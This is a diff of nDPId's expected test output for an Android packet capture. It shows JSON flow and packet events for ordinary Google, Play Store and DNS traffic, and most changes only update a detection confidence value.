+01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454871115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871115,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8q7VAAEARCZrAqAIQwKgCAZ6EADUAKMiehDwBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454871117,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871117,"pkt":"TGr2n\/YnxiwDYGpkCABFAABM2yQAAEARGhvAqAIBwKgCEAA1noQAOIeohDyBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": 